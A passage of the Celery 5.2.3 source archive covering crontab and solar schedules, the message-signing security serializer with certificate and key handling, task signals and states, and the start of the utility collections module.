ValueError(CRON_PATTERN_INVALID.format( min=min_, max=max_ - 1 + min_, value=number)) return result def _delta_to_next(self, last_run_at, next_hour, next_minute): """Find next delta. Takes a :class:`~datetime.datetime` of last run, next minute and hour, and returns a :class:`~celery.utils.time.ffwd` for the next scheduled day and time. Only called when ``day_of_month`` and/or ``month_of_year`` cronspec is specified to further limit scheduled task execution. """ datedata = AttributeDict(year=last_run_at.year) days_of_month = sorted(self.day_of_month) months_of_year = sorted(self.month_of_year) def day_out_of_range(year, month, day): try: datetime(year=year, month=month, day=day) except ValueError: return True return False def is_before_last_run(year, month, day): return self.maybe_make_aware(datetime(year, month, day)) < last_run_at def roll_over(): for _ in range(2000): flag = (datedata.dom == len(days_of_month) or day_out_of_range(datedata.year, months_of_year[datedata.moy], days_of_month[datedata.dom]) or (is_before_last_run(datedata.year, months_of_year[datedata.moy], days_of_month[datedata.dom]))) if flag: datedata.dom = 0 datedata.moy += 1 if datedata.moy == len(months_of_year): datedata.moy = 0 datedata.year += 1 else: break else: # Tried 2000 times, we're most likely in an infinite loop raise RuntimeError('unable to rollover, ' 'time specification is probably invalid') if last_run_at.month in self.month_of_year: datedata.dom = bisect(days_of_month, last_run_at.day) datedata.moy = bisect_left(months_of_year, last_run_at.month) else: datedata.dom = 0 datedata.moy = bisect(months_of_year, last_run_at.month) if datedata.moy == len(months_of_year): datedata.moy = 0 roll_over() while 1: th = datetime(year=datedata.year, month=months_of_year[datedata.moy], day=days_of_month[datedata.dom]) if th.isoweekday() % 7 in self.day_of_week: break datedata.dom += 1 roll_over() return ffwd(year=datedata.year, month=months_of_year[datedata.moy], day=days_of_month[datedata.dom], hour=next_hour, minute=next_minute, second=0, microsecond=0) def __repr__(self): return CRON_REPR.format(self) def __reduce__(self): return (self.__class__, (self._orig_minute, self._orig_hour, self._orig_day_of_week, self._orig_day_of_month, self._orig_month_of_year), self._orig_kwargs) def __setstate__(self, state): # Calling super's init because the kwargs aren't necessarily passed in # the same form as they are stored by the superclass super().__init__(**state) def remaining_delta(self, last_run_at, tz=None, ffwd=ffwd): # pylint: disable=redefined-outer-name # caching global ffwd tz = tz or self.tz last_run_at = self.maybe_make_aware(last_run_at) now = self.maybe_make_aware(self.now()) dow_num = last_run_at.isoweekday() % 7 # Sunday is day 0, not day 7 execute_this_date = ( last_run_at.month in self.month_of_year and last_run_at.day in self.day_of_month and dow_num in self.day_of_week ) execute_this_hour = ( execute_this_date and last_run_at.day == now.day and last_run_at.month == now.month and last_run_at.year == now.year and last_run_at.hour in self.hour and last_run_at.minute < max(self.minute) ) if execute_this_hour: next_minute = min(minute for minute in self.minute if minute > last_run_at.minute) delta = ffwd(minute=next_minute, second=0, microsecond=0) else: next_minute = min(self.minute) execute_today = (execute_this_date and last_run_at.hour < max(self.hour)) if execute_today: next_hour = min(hour for hour in self.hour if hour > last_run_at.hour) delta = ffwd(hour=next_hour, minute=next_minute, second=0, microsecond=0) else: next_hour = min(self.hour) all_dom_moy = (self._orig_day_of_month == '*' and self._orig_month_of_year == '*') if all_dom_moy: next_day = min([day for day in self.day_of_week if day > dow_num] or self.day_of_week) add_week = next_day == dow_num delta = ffwd( weeks=add_week and 1 or 0, weekday=(next_day - 1) % 7, hour=next_hour, minute=next_minute, second=0, microsecond=0, ) else: delta = self._delta_to_next(last_run_at, next_hour, next_minute) return self.to_local(last_run_at), delta, self.to_local(now) def remaining_estimate(self, last_run_at, ffwd=ffwd): """Estimate of next run time. Returns when the periodic task should run next as a :class:`~datetime.timedelta`. """ # pylint: disable=redefined-outer-name # caching global ffwd return remaining(*self.remaining_delta(last_run_at, ffwd=ffwd)) def is_due(self, last_run_at): """Return tuple of ``(is_due, next_time_to_run)``. Note: Next time to run is in seconds. SeeAlso: :meth:`celery.schedules.schedule.is_due` for more information. """ rem_delta = self.remaining_estimate(last_run_at) rem = max(rem_delta.total_seconds(), 0) due = rem == 0 if due: rem_delta = self.remaining_estimate(self.now()) rem = max(rem_delta.total_seconds(), 0) return schedstate(due, rem) def __eq__(self, other): if isinstance(other, crontab): return ( other.month_of_year == self.month_of_year and other.day_of_month == self.day_of_month and other.day_of_week == self.day_of_week and other.hour == self.hour and other.minute == self.minute and super().__eq__(other) ) return NotImplemented def __ne__(self, other): res = self.__eq__(other) if res is NotImplemented: return True return not res def maybe_schedule(s, relative=False, app=None): """Return schedule from number, timedelta, or actual schedule.""" if s is not None: if isinstance(s, numbers.Number): s = timedelta(seconds=s) if isinstance(s, timedelta): return schedule(s, relative, app=app) else: s.app = app return s class solar(BaseSchedule): """Solar event. A solar event can be used as the ``run_every`` value of a periodic task entry to schedule based on certain solar events. Notes: Available event valus are: - ``dawn_astronomical`` - ``dawn_nautical`` - ``dawn_civil`` - ``sunrise`` - ``solar_noon`` - ``sunset`` - ``dusk_civil`` - ``dusk_nautical`` - ``dusk_astronomical`` Arguments: event (str): Solar event that triggers this task. See note for available values. lat (int): The latitude of the observer. lon (int): The longitude of the observer. nowfun (Callable): Function returning the current date and time as a class:`~datetime.datetime`. app (Celery): Celery app instance. """ _all_events = { 'dawn_astronomical', 'dawn_nautical', 'dawn_civil', 'sunrise', 'solar_noon', 'sunset', 'dusk_civil', 'dusk_nautical', 'dusk_astronomical', } _horizons = { 'dawn_astronomical': '-18', 'dawn_nautical': '-12', 'dawn_civil': '-6', 'sunrise': '-0:34', 'solar_noon': '0', 'sunset': '-0:34', 'dusk_civil': '-6', 'dusk_nautical': '-12', 'dusk_astronomical': '18', } _methods = { 'dawn_astronomical': 'next_rising', 'dawn_nautical': 'next_rising', 'dawn_civil': 'next_rising', 'sunrise': 'next_rising', 'solar_noon': 'next_transit', 'sunset': 'next_setting', 'dusk_civil': 'next_setting', 'dusk_nautical': 'next_setting', 'dusk_astronomical': 'next_setting', } _use_center_l = { 'dawn_astronomical': True, 'dawn_nautical': True, 'dawn_civil': True, 'sunrise': False, 'solar_noon': False, 'sunset': False, 'dusk_civil': True, 'dusk_nautical': True, 'dusk_astronomical': True, } def __init__(self, event, lat, lon, **kwargs): self.ephem = __import__('ephem') self.event = event self.lat = lat self.lon = lon super().__init__(**kwargs) if event not in self._all_events: raise ValueError(SOLAR_INVALID_EVENT.format( event=event, all_events=', '.join(sorted(self._all_events)), )) if lat < -90 or lat > 90: raise ValueError(SOLAR_INVALID_LATITUDE.format(lat=lat)) if lon < -180 or lon > 180: raise ValueError(SOLAR_INVALID_LONGITUDE.format(lon=lon)) cal = self.ephem.Observer() cal.lat = str(lat) cal.lon = str(lon) cal.elev = 0 cal.horizon = self._horizons[event] cal.pressure = 0 self.cal = cal self.method = self._methods[event] self.use_center = self._use_center_l[event] def __reduce__(self): return self.__class__, (self.event, self.lat, self.lon) def __repr__(self): return ''.format( self.event, self.lat, self.lon, ) def remaining_estimate(self, last_run_at): """Return estimate of next time to run. Returns: ~datetime.timedelta: when the periodic task should run next, or if it shouldn't run today (e.g., the sun does not rise today), returns the time when the next check should take place. """ last_run_at = self.maybe_make_aware(last_run_at) last_run_at_utc = localize(last_run_at, timezone.utc) self.cal.date = last_run_at_utc try: if self.use_center: next_utc = getattr(self.cal, self.method)( self.ephem.Sun(), start=last_run_at_utc, use_center=self.use_center ) else: next_utc = getattr(self.cal, self.method)( self.ephem.Sun(), start=last_run_at_utc ) except self.ephem.CircumpolarError: # pragma: no cover # Sun won't rise/set today. Check again tomorrow # (specifically, after the next anti-transit). next_utc = ( self.cal.next_antitransit(self.ephem.Sun()) + timedelta(minutes=1) ) next = self.maybe_make_aware(next_utc.datetime()) now = self.maybe_make_aware(self.now()) delta = next - now return delta def is_due(self, last_run_at): """Return tuple of ``(is_due, next_time_to_run)``. Note: next time to run is in seconds. See Also: :meth:`celery.schedules.schedule.is_due` for more information. """ rem_delta = self.remaining_estimate(last_run_at) rem = max(rem_delta.total_seconds(), 0) due = rem == 0 if due: rem_delta = self.remaining_estimate(self.now()) rem = max(rem_delta.total_seconds(), 0) return schedstate(due, rem) def __eq__(self, other): if isinstance(other, solar): return ( other.event == self.event and other.lat == self.lat and other.lon == self.lon ) return NotImplemented def __ne__(self, other): res = self.__eq__(other) if res is NotImplemented: return True return not res ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4677508 celery-5.2.3/celery/security/0000775000175000017500000000000000000000000016027 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/__init__.py0000664000175000017500000000434200000000000020143 0ustar00asifasif00000000000000"""Message Signing Serializer.""" from kombu.serialization import \ disable_insecure_serializers as _disable_insecure_serializers from kombu.serialization import registry from celery.exceptions import ImproperlyConfigured from .serialization import register_auth # : need cryptography first CRYPTOGRAPHY_NOT_INSTALLED = """\ You need to install the cryptography library to use the auth serializer. Please install by: $ pip install cryptography """ SECURITY_SETTING_MISSING = """\ Sorry, but you have to configure the * security_key * security_certificate, and the * security_cert_store configuration settings to use the auth serializer. Please see the configuration reference for more information. """ SETTING_MISSING = """\ You have to configure a special task serializer for signing and verifying tasks: * task_serializer = 'auth' You have to accept only tasks which are serialized with 'auth'. There is no point in signing messages if they are not verified. * accept_content = ['auth'] """ __all__ = ('setup_security',) try: import cryptography # noqa except ImportError: raise ImproperlyConfigured(CRYPTOGRAPHY_NOT_INSTALLED) def setup_security(allowed_serializers=None, key=None, cert=None, store=None, digest=None, serializer='json', app=None): """See :meth:`@Celery.setup_security`.""" if app is None: from celery import current_app app = current_app._get_current_object() _disable_insecure_serializers(allowed_serializers) # check conf for sane security settings conf = app.conf if conf.task_serializer != 'auth' or conf.accept_content != ['auth']: raise ImproperlyConfigured(SETTING_MISSING) key = key or conf.security_key cert = cert or conf.security_certificate store = store or conf.security_cert_store digest = digest or conf.security_digest if not (key and cert and store): raise ImproperlyConfigured(SECURITY_SETTING_MISSING) with open(key) as kf: with open(cert) as cf: register_auth(kf.read(), cf.read(), store, digest, serializer) registry._set_default_serializer('auth') def disable_untrusted_serializers(whitelist=None): _disable_insecure_serializers(allowed=whitelist) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/certificate.py0000664000175000017500000000565700000000000020700 0ustar00asifasif00000000000000"""X.509 certificates.""" import datetime import glob import os from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import padding from cryptography.x509 import load_pem_x509_certificate from kombu.utils.encoding import bytes_to_str, ensure_bytes from celery.exceptions import SecurityError from .utils import reraise_errors __all__ = ('Certificate', 'CertStore', 'FSCertStore') class Certificate: """X.509 certificate.""" def __init__(self, cert): with reraise_errors( 'Invalid certificate: {0!r}', errors=(ValueError,) ): self._cert = load_pem_x509_certificate( ensure_bytes(cert), backend=default_backend()) def has_expired(self): """Check if the certificate has expired.""" return datetime.datetime.utcnow() >= self._cert.not_valid_after def get_pubkey(self): """Get public key from certificate.""" return self._cert.public_key() def get_serial_number(self): """Return the serial number in the certificate.""" return self._cert.serial_number def get_issuer(self): """Return issuer (CA) as a string.""" return ' '.join(x.value for x in self._cert.issuer) def get_id(self): """Serial number/issuer pair uniquely identifies a certificate.""" return f'{self.get_issuer()} {self.get_serial_number()}' def verify(self, data, signature, digest): """Verify signature for string containing data.""" with reraise_errors('Bad signature: {0!r}'): padd = padding.PSS( mgf=padding.MGF1(digest), salt_length=padding.PSS.MAX_LENGTH) self.get_pubkey().verify(signature, ensure_bytes(data), padd, digest) class CertStore: """Base class for certificate stores.""" def __init__(self): self._certs = {} def itercerts(self): """Return certificate iterator.""" yield from self._certs.values() def __getitem__(self, id): """Get certificate by id.""" try: return self._certs[bytes_to_str(id)] except KeyError: raise SecurityError(f'Unknown certificate: {id!r}') def add_cert(self, cert): cert_id = bytes_to_str(cert.get_id()) if cert_id in self._certs: raise SecurityError(f'Duplicate certificate: {id!r}') self._certs[cert_id] = cert class FSCertStore(CertStore): """File system certificate store.""" def __init__(self, path): super().__init__() if os.path.isdir(path): path = os.path.join(path, '*') for p in glob.glob(path): with open(p) as f: cert = Certificate(f.read()) if cert.has_expired(): raise SecurityError( f'Expired certificate: {cert.get_id()!r}') self.add_cert(cert) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/key.py0000664000175000017500000000202200000000000017165 0ustar00asifasif00000000000000"""Private keys for the security serializer.""" from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import padding from kombu.utils.encoding import ensure_bytes from .utils import reraise_errors __all__ = ('PrivateKey',) class PrivateKey: """Represents a private key.""" def __init__(self, key, password=None): with reraise_errors( 'Invalid private key: {0!r}', errors=(ValueError,) ): self._key = serialization.load_pem_private_key( ensure_bytes(key), password=password, backend=default_backend()) def sign(self, data, digest): """Sign string containing data.""" with reraise_errors('Unable to sign data: {0!r}'): padd = padding.PSS( mgf=padding.MGF1(digest), salt_length=padding.PSS.MAX_LENGTH) return self._key.sign(ensure_bytes(data), padd, digest) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/serialization.py0000664000175000017500000001015600000000000021261 0ustar00asifasif00000000000000"""Secure serializer.""" from kombu.serialization import dumps, loads, registry from kombu.utils.encoding import bytes_to_str, ensure_bytes, str_to_bytes from celery.app.defaults import DEFAULT_SECURITY_DIGEST from celery.utils.serialization import b64decode, b64encode from .certificate import Certificate, FSCertStore from .key import PrivateKey from .utils import get_digest_algorithm, reraise_errors __all__ = ('SecureSerializer', 'register_auth') class SecureSerializer: """Signed serializer.""" def __init__(self, key=None, cert=None, cert_store=None, digest=DEFAULT_SECURITY_DIGEST, serializer='json'): self._key = key self._cert = cert self._cert_store = cert_store self._digest = get_digest_algorithm(digest) self._serializer = serializer def serialize(self, data): """Serialize data structure into string.""" assert self._key is not None assert self._cert is not None with reraise_errors('Unable to serialize: {0!r}', (Exception,)): content_type, content_encoding, body = dumps( bytes_to_str(data), serializer=self._serializer) # What we sign is the serialized body, not the body itself. # this way the receiver doesn't have to decode the contents # to verify the signature (and thus avoiding potential flaws # in the decoding step). body = ensure_bytes(body) return self._pack(body, content_type, content_encoding, signature=self._key.sign(body, self._digest), signer=self._cert.get_id()) def deserialize(self, data): """Deserialize data structure from string.""" assert self._cert_store is not None with reraise_errors('Unable to deserialize: {0!r}', (Exception,)): payload = self._unpack(data) signature, signer, body = (payload['signature'], payload['signer'], payload['body']) self._cert_store[signer].verify(body, signature, self._digest) return loads(bytes_to_str(body), payload['content_type'], payload['content_encoding'], force=True) def _pack(self, body, content_type, content_encoding, signer, signature, sep=str_to_bytes('\x00\x01')): fields = sep.join( ensure_bytes(s) for s in [signer, signature, content_type, content_encoding, body] ) return b64encode(fields) def _unpack(self, payload, sep=str_to_bytes('\x00\x01')): raw_payload = b64decode(ensure_bytes(payload)) first_sep = raw_payload.find(sep) signer = raw_payload[:first_sep] signer_cert = self._cert_store[signer] # shift 3 bits right to get signature length # 2048bit rsa key has a signature length of 256 # 4096bit rsa key has a signature length of 512 sig_len = signer_cert.get_pubkey().key_size >> 3 sep_len = len(sep) signature_start_position = first_sep + sep_len signature_end_position = signature_start_position + sig_len signature = raw_payload[ signature_start_position:signature_end_position ] v = raw_payload[signature_end_position + sep_len:].split(sep) return { 'signer': signer, 'signature': signature, 'content_type': bytes_to_str(v[0]), 'content_encoding': bytes_to_str(v[1]), 'body': bytes_to_str(v[2]), } def register_auth(key=None, cert=None, store=None, digest=DEFAULT_SECURITY_DIGEST, serializer='json'): """Register security serializer.""" s = SecureSerializer(key and PrivateKey(key), cert and Certificate(cert), store and FSCertStore(store), digest, serializer=serializer) registry.register('auth', s.serialize, s.deserialize, content_type='application/data', content_encoding='utf-8') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/utils.py0000664000175000017500000000151500000000000017543 0ustar00asifasif00000000000000"""Utilities used by the message signing serializer.""" import sys from contextlib import contextmanager import cryptography.exceptions from cryptography.hazmat.primitives import hashes from celery.exceptions import SecurityError, reraise __all__ = ('get_digest_algorithm', 'reraise_errors',) def get_digest_algorithm(digest='sha256'): """Convert string to hash object of cryptography library.""" assert digest is not None return getattr(hashes, digest.upper())() @contextmanager def reraise_errors(msg='{0!r}', errors=None): """Context reraising crypto errors as :exc:`SecurityError`.""" errors = (cryptography.exceptions,) if errors is None else errors try: yield except errors as exc: reraise(SecurityError, SecurityError(msg.format(exc)), sys.exc_info()[2]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/signals.py0000664000175000017500000001026100000000000016172 0ustar00asifasif00000000000000"""Celery Signals. This module defines the signals (Observer pattern) sent by both workers and clients. Functions can be connected to these signals, and connected functions are called whenever a signal is called. .. seealso:: :ref:`signals` for more information. """ from .utils.dispatch import Signal __all__ = ( 'before_task_publish', 'after_task_publish', 'task_internal_error', 'task_prerun', 'task_postrun', 'task_success', 'task_received', 'task_rejected', 'task_unknown', 'task_retry', 'task_failure', 'task_revoked', 'celeryd_init', 'celeryd_after_setup', 'worker_init', 'worker_process_init', 'worker_process_shutdown', 'worker_ready', 'worker_shutdown', 'worker_shutting_down', 'setup_logging', 'after_setup_logger', 'after_setup_task_logger', 'beat_init', 'beat_embedded_init', 'heartbeat_sent', 'eventlet_pool_started', 'eventlet_pool_preshutdown', 'eventlet_pool_postshutdown', 'eventlet_pool_apply', ) # - Task before_task_publish = Signal( name='before_task_publish', providing_args={ 'body', 'exchange', 'routing_key', 'headers', 'properties', 'declare', 'retry_policy', }, ) after_task_publish = Signal( name='after_task_publish', providing_args={'body', 'exchange', 'routing_key'}, ) task_received = Signal( name='task_received', providing_args={'request'} ) task_prerun = Signal( name='task_prerun', providing_args={'task_id', 'task', 'args', 'kwargs'}, ) task_postrun = Signal( name='task_postrun', providing_args={'task_id', 'task', 'args', 'kwargs', 'retval'}, ) task_success = Signal( name='task_success', providing_args={'result'}, ) task_retry = Signal( name='task_retry', providing_args={'request', 'reason', 'einfo'}, ) task_failure = Signal( name='task_failure', providing_args={ 'task_id', 'exception', 'args', 'kwargs', 'traceback', 'einfo', }, ) task_internal_error = Signal( name='task_internal_error', providing_args={ 'task_id', 'args', 'kwargs', 'request', 'exception', 'traceback', 'einfo' } ) task_revoked = Signal( name='task_revoked', providing_args={ 'request', 'terminated', 'signum', 'expired', }, ) task_rejected = Signal( name='task_rejected', providing_args={'message', 'exc'}, ) task_unknown = Signal( name='task_unknown', providing_args={'message', 'exc', 'name', 'id'}, ) #: Deprecated, use after_task_publish instead. task_sent = Signal( name='task_sent', providing_args={ 'task_id', 'task', 'args', 'kwargs', 'eta', 'taskset', }, ) # - Program: `celery worker` celeryd_init = Signal( name='celeryd_init', providing_args={'instance', 'conf', 'options'}, ) celeryd_after_setup = Signal( name='celeryd_after_setup', providing_args={'instance', 'conf'}, ) # - Worker import_modules = Signal(name='import_modules') worker_init = Signal(name='worker_init') worker_process_init = Signal(name='worker_process_init') worker_process_shutdown = Signal(name='worker_process_shutdown') worker_ready = Signal(name='worker_ready') worker_shutdown = Signal(name='worker_shutdown') worker_shutting_down = Signal(name='worker_shutting_down') heartbeat_sent = Signal(name='heartbeat_sent') # - Logging setup_logging = Signal( name='setup_logging', providing_args={ 'loglevel', 'logfile', 'format', 'colorize', }, ) after_setup_logger = Signal( name='after_setup_logger', providing_args={ 'logger', 'loglevel', 'logfile', 'format', 'colorize', }, ) after_setup_task_logger = Signal( name='after_setup_task_logger', providing_args={ 'logger', 'loglevel', 'logfile', 'format', 'colorize', }, ) # - Beat beat_init = Signal(name='beat_init') beat_embedded_init = Signal(name='beat_embedded_init') # - Eventlet eventlet_pool_started = Signal(name='eventlet_pool_started') eventlet_pool_preshutdown = Signal(name='eventlet_pool_preshutdown') eventlet_pool_postshutdown = Signal(name='eventlet_pool_postshutdown') eventlet_pool_apply = Signal( name='eventlet_pool_apply', providing_args={'target', 'args', 'kwargs'}, ) # - Programs user_preload_options = Signal( name='user_preload_options', providing_args={'app', 'options'}, ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/states.py0000664000175000017500000000627400000000000016046 0ustar00asifasif00000000000000"""Built-in task states. .. _states: States ------ See :ref:`task-states`. .. _statesets: Sets ---- .. state:: READY_STATES READY_STATES ~~~~~~~~~~~~ Set of states meaning the task result is ready (has been executed). .. state:: UNREADY_STATES UNREADY_STATES ~~~~~~~~~~~~~~ Set of states meaning the task result is not ready (hasn't been executed). .. state:: EXCEPTION_STATES EXCEPTION_STATES ~~~~~~~~~~~~~~~~ Set of states meaning the task returned an exception. .. state:: PROPAGATE_STATES PROPAGATE_STATES ~~~~~~~~~~~~~~~~ Set of exception states that should propagate exceptions to the user. .. state:: ALL_STATES ALL_STATES ~~~~~~~~~~ Set of all possible states. Misc ---- """ __all__ = ( 'PENDING', 'RECEIVED', 'STARTED', 'SUCCESS', 'FAILURE', 'REVOKED', 'RETRY', 'IGNORED', 'READY_STATES', 'UNREADY_STATES', 'EXCEPTION_STATES', 'PROPAGATE_STATES', 'precedence', 'state', ) #: State precedence. #: None represents the precedence of an unknown state. #: Lower index means higher precedence. PRECEDENCE = [ 'SUCCESS', 'FAILURE', None, 'REVOKED', 'STARTED', 'RECEIVED', 'REJECTED', 'RETRY', 'PENDING', ] #: Hash lookup of PRECEDENCE to index PRECEDENCE_LOOKUP = dict(zip(PRECEDENCE, range(0, len(PRECEDENCE)))) NONE_PRECEDENCE = PRECEDENCE_LOOKUP[None] def precedence(state): """Get the precedence index for state. Lower index means higher precedence. """ try: return PRECEDENCE_LOOKUP[state] except KeyError: return NONE_PRECEDENCE class state(str): """Task state. State is a subclass of :class:`str`, implementing comparison methods adhering to state precedence rules:: >>> from celery.states import state, PENDING, SUCCESS >>> state(PENDING) < state(SUCCESS) True Any custom state is considered to be lower than :state:`FAILURE` and :state:`SUCCESS`, but higher than any of the other built-in states:: >>> state('PROGRESS') > state(STARTED) True >>> state('PROGRESS') > state('SUCCESS') False """ def __gt__(self, other): return precedence(self) < precedence(other) def __ge__(self, other): return precedence(self) <= precedence(other) def __lt__(self, other): return precedence(self) > precedence(other) def __le__(self, other): return precedence(self) >= precedence(other) #: Task state is unknown (assumed pending since you know the id). PENDING = 'PENDING' #: Task was received by a worker (only used in events). RECEIVED = 'RECEIVED' #: Task was started by a worker (:setting:`task_track_started`). STARTED = 'STARTED' #: Task succeeded SUCCESS = 'SUCCESS' #: Task failed FAILURE = 'FAILURE' #: Task was revoked. REVOKED = 'REVOKED' #: Task was rejected (only used in events). REJECTED = 'REJECTED' #: Task is waiting for retry. RETRY = 'RETRY' IGNORED = 'IGNORED' READY_STATES = frozenset({SUCCESS, FAILURE, REVOKED}) UNREADY_STATES = frozenset({PENDING, RECEIVED, STARTED, REJECTED, RETRY}) EXCEPTION_STATES = frozenset({RETRY, FAILURE, REVOKED}) PROPAGATE_STATES = frozenset({FAILURE, REVOKED}) ALL_STATES = frozenset({ PENDING, RECEIVED, STARTED, SUCCESS, FAILURE, RETRY, REVOKED, }) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4917512 celery-5.2.3/celery/utils/0000775000175000017500000000000000000000000015320 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/__init__.py0000664000175000017500000000164700000000000017441 0ustar00asifasif00000000000000"""Utility functions. Don't import from here directly anymore, as these are only here for backwards compatibility. """ from kombu.utils.objects import cached_property from kombu.utils.uuid import uuid from .functional import chunks, memoize, noop from .imports import gen_task_name, import_from_cwd, instantiate from .imports import qualname as get_full_cls_name from .imports import symbol_by_name as get_cls_by_name # ------------------------------------------------------------------------ # # > XXX Compat from .log import LOG_LEVELS from .nodenames import nodename, nodesplit, worker_direct gen_unique_id = uuid __all__ = ( 'LOG_LEVELS', 'cached_property', 'chunks', 'gen_task_name', 'gen_task_name', 'gen_unique_id', 'get_cls_by_name', 'get_full_cls_name', 'import_from_cwd', 'instantiate', 'memoize', 'nodename', 'nodesplit', 'noop', 'uuid', 'worker_direct' ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/abstract.py0000664000175000017500000000547200000000000017505 0ustar00asifasif00000000000000"""Abstract classes.""" from abc import ABCMeta, abstractmethod from collections.abc import Callable __all__ = ('CallableTask', 'CallableSignature') def _hasattr(C, attr): return any(attr in B.__dict__ for B in C.__mro__) class _AbstractClass(metaclass=ABCMeta): __required_attributes__ = frozenset() @classmethod def _subclasshook_using(cls, parent, C): return ( cls is parent and all(_hasattr(C, attr) for attr in cls.__required_attributes__) ) or NotImplemented @classmethod def register(cls, other): # we override `register` to return other for use as a decorator. type(cls).register(cls, other) return other class CallableTask(_AbstractClass, Callable): # pragma: no cover """Task interface.""" __required_attributes__ = frozenset({ 'delay', 'apply_async', 'apply', }) @abstractmethod def delay(self, *args, **kwargs): pass @abstractmethod def apply_async(self, *args, **kwargs): pass @abstractmethod def apply(self, *args, **kwargs): pass @classmethod def __subclasshook__(cls, C): return cls._subclasshook_using(CallableTask, C) class CallableSignature(CallableTask): # pragma: no cover """Celery Signature interface.""" __required_attributes__ = frozenset({ 'clone', 'freeze', 'set', 'link', 'link_error', '__or__', }) @property @abstractmethod def name(self): pass @property @abstractmethod def type(self): pass @property @abstractmethod def app(self): pass @property @abstractmethod def id(self): pass @property @abstractmethod def task(self): pass @property @abstractmethod def args(self): pass @property @abstractmethod def kwargs(self): pass @property @abstractmethod def options(self): pass @property @abstractmethod def subtask_type(self): pass @property @abstractmethod def chord_size(self): pass @property @abstractmethod def immutable(self): pass @abstractmethod def clone(self, args=None, kwargs=None): pass @abstractmethod def freeze(self, id=None, group_id=None, chord=None, root_id=None, group_index=None): pass @abstractmethod def set(self, immutable=None, **options): pass @abstractmethod def link(self, callback): pass @abstractmethod def link_error(self, errback): pass @abstractmethod def __or__(self, other): pass @abstractmethod def __invert__(self): pass @classmethod def __subclasshook__(cls, C): return cls._subclasshook_using(CallableSignature, C) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/collections.py0000664000175000017500000006204300000000000020215 0ustar00asifasif00000000000000"""Custom maps, sets, sequences, and other data structures.""" import time from collections import OrderedDict as _OrderedDict from collections import deque from collections.abc import (Callable, Mapping, MutableMapping, MutableSet, Sequence) from heapq import heapify, heappop, heappush from itertools import chain, count from queue import Empty from typing import Any, Dict, Iterable, List from .functional import first, uniq from .text import match_case try: # pypy: dicts are ordered in recent versions from __pypy__ import reversed_dict as _dict_is_ordered except ImportError: _dict_is_ordered = None try: from django.utils.functional import LazyObject, LazySettings except ImportError: class LazyObject: pass LazySettings = LazyObject __all__ = ( 'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap', 'ConfigurationView', 'DictAttribute', 'Evictable', 'LimitedSet', 'Messagebuffer', 'OrderedDict', 'force_mapping', 'lpmerge', ) REPR_LIMITED_SET = """\ <{name}({size}): maxlen={0.maxlen}, expires={0.expires}, minlen={0.minlen}>\ """ def force_mapping(m): # type: (Any) -> Mapping """Wrap object into supporting the mapping interface if necessary.""" if isinstance(m, (LazyObject, LazySettings)): m = m._wrapped return DictAttribute(m) if not isinstance(m, Mapping) else m def lpmerge(L, R): # type: (Mapping, Mapping) -> Mapping """In place left precedent dictionary merge. Keeps values from `L`, if the value in `R` is :const:`None`. """ setitem = L.__setitem__ [setitem(k, v) for k, v in R.items() if v is not None] return L class OrderedDict(_OrderedDict): """Dict where insertion order matters.""" def _LRUkey(self): # type: () -> Any # return value of od.keys does not support __next__, # but this version will also not create a copy of the list. return next(iter(self.keys())) if not hasattr(_OrderedDict, 'move_to_end'): if _dict_is_ordered: # pragma: no cover def move_to_end(self, key, last=True): # type: (Any, bool) -> None if not last: # we don't use this argument, and the only way to # implement this on PyPy seems to be O(n): creating a # copy with the order changed, so we just raise. raise NotImplementedError('no last=True on PyPy') self[key] = self.pop(key) else: def move_to_end(self, key, last=True): # type: (Any, bool) -> None link = self._OrderedDict__map[key] link_prev = link[0] link_next = link[1] link_prev[1] = link_next link_next[0] = link_prev root = self._OrderedDict__root if last: last = root[0] link[0] = last link[1] = root last[1] = root[0] = link else: first_node = root[1] link[0] = root link[1] = first_node root[1] = first_node[0] = link class AttributeDictMixin: """Mixin for Mapping interface that adds attribute access. I.e., `d.key -> d[key]`). """ def __getattr__(self, k): # type: (str) -> Any """`d.key -> d[key]`.""" try: return self[k] except KeyError: raise AttributeError( f'{type(self).__name__!r} object has no attribute {k!r}') def __setattr__(self, key, value): # type: (str, Any) -> None """`d[key] = value -> d.key = value`.""" self[key] = value class AttributeDict(dict, AttributeDictMixin): """Dict subclass with attribute access.""" class DictAttribute: """Dict interface to attributes. `obj[k] -> obj.k` `obj[k] = val -> obj.k = val` """ obj = None def __init__(self, obj): # type: (Any) -> None object.__setattr__(self, 'obj', obj) def __getattr__(self, key): # type: (Any) -> Any return getattr(self.obj, key) def __setattr__(self, key, value): # type: (Any, Any) -> None return setattr(self.obj, key, value) def get(self, key, default=None): # type: (Any, Any) -> Any try: return self[key] except KeyError: return default def setdefault(self, key, default=None): # type: (Any, Any) -> None if key not in self: self[key] = default def __getitem__(self, key): # type: (Any) -> Any try: return getattr(self.obj, key) except AttributeError: raise KeyError(key) def __setitem__(self, key, value): # type: (Any, Any) -> Any setattr(self.obj, key, value) def __contains__(self, key): # type: (Any) -> bool return hasattr(self.obj, 